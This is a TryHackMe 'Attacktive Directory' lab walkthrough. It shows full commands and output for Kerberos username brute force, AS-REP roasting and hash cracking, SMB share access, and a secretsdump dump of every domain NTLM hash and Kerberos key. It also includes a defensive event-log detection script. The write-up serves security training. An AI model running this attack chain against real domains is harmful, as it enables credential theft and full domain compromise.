ACTIVEDIRECTORY (TRYHACKME)
First, we run nmap against the target to enumerate all 65535 TCP ports, with service detection (-sV) and the default NSE scripts (-sC):
- sudo nmap -n -Pn -p- --min-rate 5000 10.10.135.154 -vvv -sC -sV
This revealed several open TCP ports with associated services, including:
- DNS (53),
- HTTP (80),
- Kerberos (88),
- RPC (135),
- NetBIOS-SSN (139),
- SMB (445),
- RDP (3389),
- WS-Management (5985),
- LDAP (389, 636, 3268, 3269).
Moreover, service and NSE script detection provided valuable information about the services running on these ports, such as IIS 10.0, Microsoft Windows Kerberos, Active Directory LDAP, and Microsoft Terminal Services. The SSL/TLS certificate information on port 3389 indicated the common name AttacktiveDirectory.spookysec.local, reinforcing the target as an Active Directory server. rdp-ntlm-info also provided details about the domain (THM-AD) and computer name (ATTACKTIVEDIREC) as you can see below.
┌──(kali㉿kali)-[~]
└─$ sudo nmap -n -Pn -p- --min-rate 5000 10.10.135.154 -vvv -sC -sV
[sudo] password for kali:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-15 20:16 CEST
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:16
Completed NSE at 20:16, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:16
Completed NSE at 20:16, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:16
Completed NSE at 20:16, 0.00s elapsed
Initiating SYN Stealth Scan at 20:16
Scanning 10.10.135.154 [65535 ports]
Discovered open port 135/tcp on 10.10.135.154
Discovered open port 53/tcp on 10.10.135.154
Discovered open port 3389/tcp on 10.10.135.154
Discovered open port 445/tcp on 10.10.135.154
Discovered open port 80/tcp on 10.10.135.154
Discovered open port 139/tcp on 10.10.135.154
Discovered open port 47001/tcp on 10.10.135.154
Increasing send delay for 10.10.135.154 from 0 to 5 due to 898 out of 2992 dropped probes since last increase.
Increasing send delay for 10.10.135.154 from 5 to 10 due to max_successful_tryno increase to 4
Increasing send delay for 10.10.135.154 from 10 to 20 due to max_successful_tryno increase to 5
Increasing send delay for 10.10.135.154 from 20 to 40 due to max_successful_tryno increase to 6
Increasing send delay for 10.10.135.154 from 40 to 80 due to max_successful_tryno increase to 7
Increasing send delay for 10.10.135.154 from 80 to 160 due to max_successful_tryno increase to 8
Increasing send delay for 10.10.135.154 from 160 to 320 due to max_successful_tryno increase to 9
Increasing send delay for 10.10.135.154 from 320 to 640 due to max_successful_tryno increase to 10
Warning: 10.10.135.154 giving up on port because retransmission cap hit (10).
Discovered open port 49697/tcp on 10.10.135.154
Discovered open port 636/tcp on 10.10.135.154
Increasing send delay for 10.10.135.154 from 640 to 1000 due to 415 out of 1382 dropped probes since last increase.
Discovered open port 636/tcp on 10.10.135.154
Discovered open port 49811/tcp on 10.10.135.154
Discovered open port 49665/tcp on 10.10.135.154
Discovered open port 5985/tcp on 10.10.135.154
Discovered open port 389/tcp on 10.10.135.154
Discovered open port 49665/tcp on 10.10.135.154
Discovered open port 49675/tcp on 10.10.135.154
Discovered open port 49672/tcp on 10.10.135.154
Discovered open port 593/tcp on 10.10.135.154
Discovered open port 593/tcp on 10.10.135.154
Discovered open port 49664/tcp on 10.10.135.154
Discovered open port 3268/tcp on 10.10.135.154
Discovered open port 9389/tcp on 10.10.135.154
Discovered open port 49679/tcp on 10.10.135.154
Discovered open port 49685/tcp on 10.10.135.154
Discovered open port 3269/tcp on 10.10.135.154
Discovered open port 88/tcp on 10.10.135.154
Discovered open port 49669/tcp on 10.10.135.154
Discovered open port 464/tcp on 10.10.135.154
Discovered open port 49666/tcp on 10.10.135.154
Discovered open port 49676/tcp on 10.10.135.154
Completed SYN Stealth Scan at 20:16, 35.72s elapsed (65535 total ports)
Initiating Service scan at 20:16
Scanning 27 services on 10.10.135.154
Service scan Timing: About 66.67% done; ETC: 20:18 (0:00:31 remaining)
Completed Service scan at 20:18, 69.99s elapsed (27 services on 1 host)
NSE: Script scanning 10.10.135.154.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:18
Completed NSE at 20:18, 12.10s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:18
Completed NSE at 20:18, 12.49s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:18
Completed NSE at 20:18, 0.01s elapsed
Nmap scan report for 10.10.135.154
Host is up, received user-set (0.33s latency).
Scanned at 2025-04-15 20:16:15 CEST for 131s
Not shown: 65396 closed tcp ports (reset), 112 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 125 Simple DNS Plus
80/tcp open http syn-ack ttl 125 Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec syn-ack ttl 125 Microsoft Windows Kerberos (server time: 2025-04-15 18:17:03Z)
135/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 125 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 125
464/tcp open kpasswd5? syn-ack ttl 125
593/tcp open ncacn_http syn-ack ttl 125 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 125
3268/tcp open ldap syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 125
3389/tcp open ms-wbt-server syn-ack ttl 125 Microsoft Terminal Services
| ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local
| Issuer: commonName=AttacktiveDirectory.spookysec.local
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-04-14T17:51:51
| Not valid after: 2025-10-14T17:51:51
| MD5: ae8f:2dd8:4778:d68e:7542:3cc0:0705:bae7
| SHA-1: 83cc:685d:d255:78e3:c866:0970:5c51:cb8d:42fb:a57a
| rdp-ntlm-info:
| Target_Name: THM-AD
| NetBIOS_Domain_Name: THM-AD
| NetBIOS_Computer_Name: ATTACKTIVEDIREC
| DNS_Domain_Name: spookysec.local
| DNS_Computer_Name: AttacktiveDirectory.spookysec.local
| Product_Version: 10.0.17763
|_ System_Time: 2025-04-15T18:18:07+00:00
|_ssl-date: 2025-04-15T18:18:18+00:00; +4s from scanner time.
5985/tcp open http syn-ack ttl 125 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf syn-ack ttl 125 .NET Message Framing
47001/tcp open http syn-ack ttl 125 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49669/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49672/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49675/tcp open ncacn_http syn-ack ttl 125 Microsoft Windows RPC over HTTP 1.0
49676/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49679/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49685/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49697/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49811/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
Service Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 32034/tcp): CLEAN (Couldn't connect)
| Check 2 (port 44991/tcp): CLEAN (Couldn't connect)
| Check 3 (port 10246/udp): CLEAN (Failed to receive data)
| Check 4 (port 11504/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: mean: 3s, deviation: 0s, median: 3s
| smb2-time:
| date: 2025-04-15T18:18:09
|_ start_date: N/A
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 20:18
Completed NSE at 20:18, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 20:18
Completed NSE at 20:18, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 20:18
Completed NSE at 20:18, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 131.01 seconds
Raw packets sent: 173149 (7.619MB) | Rcvd: 75486 (3.020MB)
So that the tools below can address the target by its DNS name, spookysec.local is mapped to the machine's IP address in /etc/hosts (the other entries are unrelated to this lab):
127.0.0.1 localhost
127.0.1.1 kali
192.168.1.100 escolares.dl
192.168.88.4 megachange.nyx
10.10.135.154 spookysec.local
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
Next we run enum4linux against the domain name. Although anonymous enumeration of users, shares and the password policy failed (NT_STATUS_ACCESS_DENIED), the server accepted a null session, and the tool retrieved the domain SID (S-1-5-21-3591857110-2884097990-301047963) and confirmed that the host belongs to the THM-AD domain, as shown below:
┌──(kali㉿kali)-[~]
└─$ sudo enum4linux spookysec.local
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Apr 15 20:20:11 2025
=========================================( Target Information )=========================================
Target ........... spookysec.local
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
==========================( Enumerating Workgroup/Domain on spookysec.local )==========================
[E] Can't find workgroup/domain
==============================( Nbtstat Information for spookysec.local )==============================
Looking up status of 10.10.135.154
No reply from 10.10.135.154
==================================( Session Check on spookysec.local )==================================
[+] Server spookysec.local allows sessions using username '', password ''
===============================( Getting domain SID for spookysec.local )===============================
Domain Name: THM-AD
Domain Sid: S-1-5-21-3591857110-2884097990-301047963
[+] Host is part of a domain (not a workgroup)
=================================( OS information on spookysec.local )=================================
[E] Can't get OS info with smbclient
[+] Got OS info for spookysec.local from srvinfo:
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
======================================( Users on spookysec.local )======================================
[E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED
[E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED
================================( Share Enumeration on spookysec.local )================================
do_connect: Connection to spookysec.local failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available
[+] Attempting to map shares on spookysec.local
==========================( Password Policy Information for spookysec.local )==========================
[E] Unexpected error from polenum:
[+] Attaching to spookysec.local using a NULL share
[+] Trying protocol 139/SMB...
[!] Protocol failed: Cannot request session (Called Name:SPOOKYSEC.LOCAL)
[+] Trying protocol 445/SMB...
[!] Protocol failed: SAMR SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.
[E] Failed to get password policy with rpcclient
=====================================( Groups on spookysec.local )=====================================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
=================( Users on spookysec.local via RID cycling (RIDS: 500-550,1000-1050) )=================
[I] Found new SID:
S-1-5-21-3591857110-2884097990-301047963
[I] Found new SID:
S-1-5-21-3591857110-2884097990-301047963
[+] Enumerating users using SID S-1-5-21-3532885019-1334016158-1514108833 and logon username '', password ''
S-1-5-21-3532885019-1334016158-1514108833-500 ATTACKTIVEDIREC\Administrator (Local User)
S-1-5-21-3532885019-1334016158-1514108833-501 ATTACKTIVEDIREC\Guest (Local User)
S-1-5-21-3532885019-1334016158-1514108833-503 ATTACKTIVEDIREC\DefaultAccount (Local User)
S-1-5-21-3532885019-1334016158-1514108833-504 ATTACKTIVEDIREC\WDAGUtilityAccount (Local User)
S-1-5-21-3532885019-1334016158-1514108833-513 ATTACKTIVEDIREC\None (Domain Group)
Now we move on to Kerberos: by requesting tickets for each candidate username we can learn which accounts exist in the domain, which gives us targets for the next step.
For this we need the kerbrute toolkit. Note that the wget shown below fetches the .git URL, which GitHub answers with its HTML page (Length: unspecified [text/html]) rather than the repository; the kerbrute working directory used in the following steps is a checkout of the repository itself.
┌──(root💀kali)-[/home/kali/Downloads]
└─# wget https://github.com/TarlogicSecurity/kerbrute.git
--2025-04-15 20:25:56-- https://github.com/TarlogicSecurity/kerbrute.git
Resolving github.com (github.com)... 20.26.156.215
Connecting to github.com (github.com)|20.26.156.215|:443... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: https://github.com/TarlogicSecurity/kerbrute [following]
--2025-04-15 20:25:56-- https://github.com/TarlogicSecurity/kerbrute
Reusing existing connection to github.com:443.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: ‘kerbrute.git’
kerbrute.git [ <=> ] 248.29K 173KB/s in 1.4s
2025-04-15 20:25:58 (173 KB/s) - ‘kerbrute.git’ saved [254248]
Inside the kerbrute directory, ls shows the requirements.txt that lists the toolkit's Python dependencies, which we install next:
┌──(root💀kali)-[/home/kali/Downloads/kerbrute]
└─# ls
hash.txt kerbrute.py MANIFEST.in requirements.txt
kerbrute LICENSE README.md setup.py
Because Kali's system Python is externally managed, pip needs the --break-system-packages flag to install into it. As the output below shows, the install aborts when pip cannot uninstall the Debian-packaged cryptography 43.0.0 to downgrade it for pyOpenSSL 24.0.0; this does not matter here, because the only direct requirement, impacket 0.12.0, is already installed system-wide and kerbrute.py runs against it.
┌──(root💀kali)-[/home/kali/Downloads/kerbrute]
└─# pip3 install -r requirements.txt --break-system-packages
Requirement already satisfied: impacket in /usr/lib/python3/dist-packages (from -r requirements.txt (line 1)) (0.12.0)
Requirement already satisfied: pyasn1>=0.2.3 in /usr/lib/python3/dist-packages (from impacket->-r requirements.txt (line 1)) (0.6.1)
Requirement already satisfied: pyasn1_modules in /usr/lib/python3/dist-packages (from impacket->-r requirements.txt (line 1)) (0.4.1)
Requirement already satisfied: pycryptodomex in /usr/lib/python3/dist-packages (from impacket->-r requirements.txt (line 1)) (3.20.0)
Collecting pyOpenSSL==24.0.0 (from impacket->-r requirements.txt (line 1))
Using cached pyOpenSSL-24.0.0-py3-none-any.whl.metadata (12 kB)
Requirement already satisfied: six in /usr/lib/python3/dist-packages (from impacket->-r requirements.txt (line 1)) (1.17.0)
Requirement already satisfied: ldap3!=2.5.0,!=2.5.2,!=2.6,>=2.5 in /usr/lib/python3/dist-packages (from impacket->-r requirements.txt (line 1)) (2.9.1)
Requirement already satisfied: ldapdomaindump>=0.9.0 in /usr/lib/python3/dist-packages (from impacket->-r requirements.txt (line 1)) (0.9.4)
Requirement already satisfied: flask>=1.0 in /usr/lib/python3/dist-packages (from impacket->-r requirements.txt (line 1)) (3.1.0)
Requirement already satisfied: setuptools in /usr/lib/python3/dist-packages (from impacket->-r requirements.txt (line 1)) (75.8.0)
Requirement already satisfied: charset_normalizer in /usr/lib/python3/dist-packages (from impacket->-r requirements.txt (line 1)) (3.4.1)
Collecting cryptography<43,>=41.0.5 (from pyOpenSSL==24.0.0->impacket->-r requirements.txt (line 1))
Using cached cryptography-42.0.8-cp39-abi3-manylinux_2_28_x86_64.whl.metadata (5.3 kB)
Requirement already satisfied: Werkzeug>=3.1 in /usr/lib/python3/dist-packages (from flask>=1.0->impacket->-r requirements.txt (line 1)) (3.1.3)
Requirement already satisfied: Jinja2>=3.1.2 in /usr/lib/python3/dist-packages (from flask>=1.0->impacket->-r requirements.txt (line 1)) (3.1.6)
Requirement already satisfied: itsdangerous>=2.2 in /usr/lib/python3/dist-packages (from flask>=1.0->impacket->-r requirements.txt (line 1)) (2.2.0)
Requirement already satisfied: click>=8.1.3 in /usr/lib/python3/dist-packages (from flask>=1.0->impacket->-r requirements.txt (line 1)) (8.1.8)
Requirement already satisfied: blinker>=1.9 in /usr/lib/python3/dist-packages (from flask>=1.0->impacket->-r requirements.txt (line 1)) (1.9.0)
Requirement already satisfied: cffi>=1.12 in /usr/lib/python3/dist-packages (from cryptography<43,>=41.0.5->pyOpenSSL==24.0.0->impacket->-r requirements.txt (line 1)) (1.17.1)
Requirement already satisfied: MarkupSafe>=2.0 in /usr/lib/python3/dist-packages (from Jinja2>=3.1.2->flask>=1.0->impacket->-r requirements.txt (line 1)) (2.1.5)
Requirement already satisfied: pycparser in /usr/lib/python3/dist-packages (from cffi>=1.12->cryptography<43,>=41.0.5->pyOpenSSL==24.0.0->impacket->-r requirements.txt (line 1)) (2.22)
Using cached pyOpenSSL-24.0.0-py3-none-any.whl (58 kB)
Using cached cryptography-42.0.8-cp39-abi3-manylinux_2_28_x86_64.whl (3.9 MB)
Installing collected packages: cryptography, pyOpenSSL
Attempting uninstall: cryptography
Found existing installation: cryptography 43.0.0
error: uninstall-no-record-file
× Cannot uninstall cryptography 43.0.0
╰─> The package's contents are unknown: no RECORD file was found for cryptography.
hint: The package was installed by debian. You should check if it can uninstall the package.
To run this attack we also need two wordlists, which we download below:
- USER LIST
- PASSWORD LIST
┌──(root💀kali)-[/home/kali/Downloads/kerbrute]
└─# wget https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/userlist.txt
--2025-04-15 20:29:25-- https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/userlist.txt
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.109.133, 185.199.108.133, 185.199.111.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.109.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 540470 (528K) [text/plain]
Saving to: ‘userlist.txt’
userlist.txt 100%[==============>] 527.80K 50.9KB/s in 8.8s
2025-04-15 20:29:34 (59.9 KB/s) - ‘userlist.txt’ saved [540470/540470]
┌──(root💀kali)-[/home/kali/Downloads/kerbrute]
└─# wget https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/passwordlist.txt
--2025-04-15 20:30:12-- https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/passwordlist.txt
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.111.133, 185.199.108.133, 185.199.110.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.111.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 569236 (556K) [text/plain]
Saving to: ‘passwordlist.txt’
passwordlist.txt 100%[==============>] 555.89K 26.9KB/s in 16s
2025-04-15 20:30:30 (34.6 KB/s) - ‘passwordlist.txt’ saved [569236/569236]
Now we run kerbrute.py with the user and password lists against the spookysec.local domain to find out which usernames are valid:
┌──(root💀kali)-[/home/kali/Downloads/kerbrute]
└─# python3 kerbrute.py -users userlist.txt -password passwordlist.txt -domain spookysec.local -t 100
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Valid user => james
[*] Blocked/Disabled user => guest
[*] Valid user => svc-admin [NOT PREAUTH]
[*] Valid user => James
[*] Valid user => robin
[*] Valid user => darkstar
[*] Valid user => administrator
[*] Valid user => backup
[*] Valid user => paradox
The Kerberos brute force identified several valid users, and svc-admin is reported as [NOT PREAUTH]: the account has Kerberos pre-authentication disabled (the DONT_REQ_PREAUTH flag), which makes it vulnerable to AS-REP Roasting.
We therefore use Impacket's GetNPUsers.py to request a TGT for svc-admin without pre-authentication. The KDC answers with an AS-REP whose encrypted part is protected by a key derived from the account's password, and Impacket prints it as a crackable $krb5asrep$ hash, as shown below.
┌──(root💀kali)-[/home/kali/Downloads/kerbrute]
└─# impacket-GetNPUsers spookysec.local/svc-admin -no-pass
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for svc-admin
/usr/share/doc/python3-impacket/examples/GetNPUsers.py:165: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:3f583a933c45f65677c7518b7b54ef3e$b4c7dec13a6a8bfc27860cab0c2eeb82ae27d0cac58b63b766e4526dcc8e7ff223705e51e5dcd4065cdd89adb7b4d1cd8c387f872825a9b76a560435c6a9a954e767fa7267ffe63d3ea5eb0955926c8216d34d9267561dd79b9708750a9ea559971d37987fb4223938fd9c11b24dcb18c39b96c649256911f785ecc14cfae4498f3f85bae7f29f38bc2a2a22e7cb61a89d695c823ccbcd3c49ecf470676d60614fb4be9326a812a0a5ef6aa0ac529af9e62c275c0958feada137054375a3cfe1fb9b501e74378600ae0ba7f42100ff98ca237e032ff8c46b66a0434425457b30da119ee62b50711f7df43ea53ccf5d0b3ee9
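From the defender's side, the two actions in this step leave a clear trail on the domain controller. The following Python is an added example (not part of this writeup, kerbrute or Impacket) that runs two checks over constructed Windows Security event 4768 records: a burst of KDC_ERR_C_PRINCIPAL_UNKNOWN failures from one source, which is the username sweep, and a successful TGT request with PreAuthType 0, which is the AS-REP roast. It assumes "Audit Kerberos Authentication Service" is enabled for success and failure on the DC; the event records and IP addresses are constructed.

```python
from collections import Counter

# Field values as they appear in Windows Security event 4768 (a Kerberos
# authentication ticket was requested). Codes are hex strings in the event.
STATUS_SUCCESS = "0x0"
KDC_ERR_C_PRINCIPAL_UNKNOWN = "0x6"   # requested user does not exist
PREAUTH_NONE = "0"                    # PreAuthType 0: no pre-authentication
ETYPE_RC4_HMAC = "0x17"               # 23 decimal, the "23" in $krb5asrep$23$
ETYPE_AES256 = "0x12"


def ev(ip, user, status, preauth="-", etype="-"):
    """Build one constructed 4768 record (a subset of the real fields)."""
    return {"id": 4768, "ip": ip, "user": user, "status": status,
            "preauth": preauth, "etype": etype}


# Constructed sample log, not real data: a wordlist sweep from 10.50.0.7 that
# mostly hits non-existent users, one no-pre-auth TGT for svc-admin from the
# same host, and ordinary activity from a workstation at 10.50.0.9.
EVENTS = (
    [ev("10.50.0.7", f"guess{i}", KDC_ERR_C_PRINCIPAL_UNKNOWN) for i in range(40)]
    + [ev("10.50.0.7", "svc-admin", STATUS_SUCCESS, PREAUTH_NONE, ETYPE_RC4_HMAC)]
    + [ev("10.50.0.9", "robin", STATUS_SUCCESS, "2", ETYPE_AES256)]   # normal logon
    + [ev("10.50.0.9", "rob1n", KDC_ERR_C_PRINCIPAL_UNKNOWN)]          # a single typo
)


def detect_user_enumeration(events, threshold=10):
    """Return {source_ip: count} for hosts that triggered at least `threshold`
    'principal unknown' failures. Valid usernames never produce 0x6, so a
    burst of them from one source is a username sweep, not mistyped logons."""
    fails = Counter(e["ip"] for e in events
                    if e["id"] == 4768 and e["status"] == KDC_ERR_C_PRINCIPAL_UNKNOWN)
    return {ip: n for ip, n in fails.items() if n >= threshold}


def detect_asrep_roast(events):
    """Return (ip, user, rc4) for successful TGT requests made without
    pre-authentication. The KDC only issues such a ticket when the account
    has DONT_REQ_PREAUTH set; rc4 is True when the reply used RC4-HMAC,
    the cheapest case to crack offline."""
    return [(e["ip"], e["user"], e["etype"] == ETYPE_RC4_HMAC)
            for e in events
            if e["id"] == 4768 and e["status"] == STATUS_SUCCESS
            and e["preauth"] == PREAUTH_NONE]


def accounts_to_fix(events):
    """Usernames whose 'Do not require Kerberos preauthentication' setting
    should be cleared (or, if it must stay, given a long random password and
    AES-only keys so an RC4 AS-REP is never issued)."""
    return sorted({user for _, user, _ in detect_asrep_roast(events)})


if __name__ == "__main__":
    print("enumeration sources:", detect_user_enumeration(EVENTS))
    print("AS-REP roast hits:", detect_asrep_roast(EVENTS))
    print("accounts to fix:", accounts_to_fix(EVENTS))
```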
Now we crack this hash offline with hashcat or John the Ripper; with john, which recognises the $krb5asrep$ format automatically, the command is:
- john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt (on Kali the rockyou wordlist lives under /usr/share/wordlists; the recovered password is management2005).
With the password in hand, we use smbclient to list the shares this user can reach and see whether anything interesting is accessible:
┌──(root💀kali)-[/home/kali/Downloads/kerbrute]
└─# smbclient -L spookysec.local --user svc-admin --password management2005
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
backup Disk
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to spookysec.local failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
The backup share is interesting, so we connect to it with the command below and list its contents with dir. It contains a single file, backup_credentials.txt, which we download with get:
┌──(root💀kali)-[/home/kali/Downloads/kerbrute]
└─# smbclient \\\\spookysec.local\\backup --user svc-admin --password management2005
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sat Apr 4 21:08:39 2020
.. D 0 Sat Apr 4 21:08:39 2020
backup_credentials.txt A 48 Sat Apr 4 21:08:53 2020
8247551 blocks of size 4096. 3561679 blocks available
smb: \> get backup_credentials.txt
getting file \backup_credentials.txt of size 48 as backup_credentials.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \>
Printing the file with cat shows that its content is base64-encoded:
┌──(root💀kali)-[/home/kali/Downloads/kerbrute]
└─# cat backup_credentials.txt
YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw
Decoding it with base64 -d reveals what looks like a username and password:
┌──(root💀kali)-[/home/kali/Downloads/kerbrute]
└─# echo -n "YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw" | base64 -d
backup@spookysec.local:backup2517860
With the backup user's credentials (password backup2517860) we run secretsdump against the domain controller. It uses the DRSUAPI replication method to pull the NTDS.DIT secrets, which only works because this account holds directory replication rights, and extracts the NTLM hashes and Kerberos keys of every domain user and machine account, including the Administrator's hash, as shown below. Two details in the dump are worth noting: a-spooks has exactly the same NT hash as Administrator, and skidy shares its NT hash with breakerofthings, so those pairs of accounts use the same password.
┌──(root💀kali)-[/home/kali/Downloads/kerbrute]
└─# impacket-secretsdump -just-dc backup@10.10.135.154
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Password:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21:::
spookysec.local\skidy:1103:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\breakerofthings:1104:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\james:1105:aad3b435b51404eeaad3b435b51404ee:9448bf6aba63d154eb0c665071067b6b:::
spookysec.local\optional:1106:aad3b435b51404eeaad3b435b51404ee:436007d1c1550eaf41803f1272656c9e:::
spookysec.local\sherlocksec:1107:aad3b435b51404eeaad3b435b51404ee:b09d48380e99e9965416f0d7096b703b:::
spookysec.local\darkstar:1108:aad3b435b51404eeaad3b435b51404ee:cfd70af882d53d758a1612af78a646b7:::
spookysec.local\Ori:1109:aad3b435b51404eeaad3b435b51404ee:c930ba49f999305d9c00a8745433d62a:::
spookysec.local\robin:1110:aad3b435b51404eeaad3b435b51404ee:642744a46b9d4f6dff8942d23626e5bb:::
spookysec.local\paradox:1111:aad3b435b51404eeaad3b435b51404ee:048052193cfa6ea46b5a302319c0cff2:::
spookysec.local\Muirland:1112:aad3b435b51404eeaad3b435b51404ee:3db8b1419ae75a418b3aa12b8c0fb705:::
spookysec.local\horshark:1113:aad3b435b51404eeaad3b435b51404ee:41317db6bd1fb8c21c2fd2b675238664:::
spookysec.local\svc-admin:1114:aad3b435b51404eeaad3b435b51404ee:fc0f1e5359e372aa1f69147375ba6809:::
spookysec.local\backup:1118:aad3b435b51404eeaad3b435b51404ee:19741bde08e135f4b40f1ca9aab45538:::
spookysec.local\a-spooks:1601:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
ATTACKTIVEDIREC$:1000:aad3b435b51404eeaad3b435b51404ee:72394637ee1662dc93da9066254ca864:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:713955f08a8654fb8f70afe0e24bb50eed14e53c8b2274c0c701ad2948ee0f48
Administrator:aes128-cts-hmac-sha1-96:e9077719bc770aff5d8bfc2d54d226ae
Administrator:des-cbc-md5:2079ce0e5df189ad
krbtgt:aes256-cts-hmac-sha1-96:b52e11789ed6709423fd7276148cfed7dea6f189f3234ed0732725cd77f45afc
krbtgt:aes128-cts-hmac-sha1-96:e7301235ae62dd8884d9b890f38e3902
krbtgt:des-cbc-md5:b94f97e97fabbf5d
spookysec.local\skidy:aes256-cts-hmac-sha1-96:3ad697673edca12a01d5237f0bee628460f1e1c348469eba2c4a530ceb432b04
